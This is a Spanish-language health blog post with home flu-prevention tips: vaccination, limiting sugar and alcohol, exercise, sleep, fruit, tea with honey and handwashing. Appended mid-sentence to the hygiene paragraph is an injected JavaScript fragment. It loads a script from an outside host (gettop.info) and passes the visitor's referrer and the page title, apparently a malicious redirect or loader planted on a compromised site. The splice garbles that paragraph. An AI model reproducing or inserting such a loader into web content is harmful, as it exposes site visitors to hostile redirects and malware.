Salud y belleza » Salud

Anticipándonos a la Gripe

Sin Comentarios

Prevenir la gripe

No se sabe bien por qué. Tal vez por costumbre. O por filosofía. Quizás por descuido.
Lo cierto es que, en cuestiones médicas, el hombre huye de las estrategias: su plan siempre es el contraataque. Es cierto que, en determinadas ocasiones, la falta de recursos (léase “falta de medicinas contra determinadas enfermedades”) nos hace imposible planear un ataque contra el enemigo pero, aún así, en otras ocasiones, cuando sí tenemos a mano las armas para “prevenir”, de todos modos preferimos “curar”.

Al menos en este caso no podrán decir que las armas no se les brindaron en bandeja: a continuación presentamos un análisis con consejos, no para curarse de una gripe sino para, directamente, bajar considerablemente el riesgo de pillarla.

Porque, así en la salud como en el box, el que pega primero, pega dos veces…

A modo de prólogo, vale advertir que, por supuesto, el mejor paso es darse determinadas vacunas (sobre todo los niños y ancianos) contra la gripe. Aún así, en ocasiones, éstas no alcanzan por lo que tener a mano algunos de los siguientes remedios caseros viene genial.

No abusar del azúcar. La alimentación es un punto fundamental para la prevención de cualquier enfermedad (pescamos una gripe, en parte, porque nuestro cuerpo se halló débil frente a algún agente externo).
El azúcar compromete y entorpece el funcionamiento del sistema inmunológico.
Consúmela con control.

Disminuir el consumo de alcohol. Ocurre un efecto similar que con el azúcar pero elevado, como mínimo, al cubo. El alcohol en exceso pone en jaque al organismo y nos vuelve sumamente vulnerables.

Realizar ejercicio.
Correr, marchar, caminar, trotar. Lo que sea, tú escoges, pero hazlo. Y con constancia. Transpirar es un ejercicio fundamental para el organismo (cuando hacemos tareas físicas las células del cuerpo se agilizan).

Controlar horas de sueño.
Un cuerpo descansado es un cuerpo más saludable. Al dormir se regeneran células, con esto el sistema inmunitario funciona adecuadamente. Además, las horas de sueño no se recuperan, por lo tanto no intentes compensar: duerme en tiempo y forma (8 hs es el mínimo recomendado en un adulto).

Incorporar frutas y verduras a tu dieta.
¿Las más nutritivas? Naranja (pura vitamina C) y el brócoli. Estos dos son alimentos especialmente ricos en antioxidantes que te pueden ayudar a potenciar tus defensas.

Beber té con miel.
Desde que las abejas son abejas, el té con miel ha sido un elixir fabuloso para mantener las defensas del organismo trabajando horas extra. Antioxidantes, vitamina C, vitamina E son algunas de las propiedades con las que abastecerás a tu cuerpo.

Cuidar higiene.
La mayoría de las enfermedades se presentan desde el exterior, del contacto con otras personas. Lávate las manos frecuentemente con agua y jabón,  si no estás cerca de una fuente de agua, usa un desinfectante de manos a base de alcohol. Sé especialmente cuidadoso a la hora de preparar la comida: lava y cocina adecuadamente frutas y carnes.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.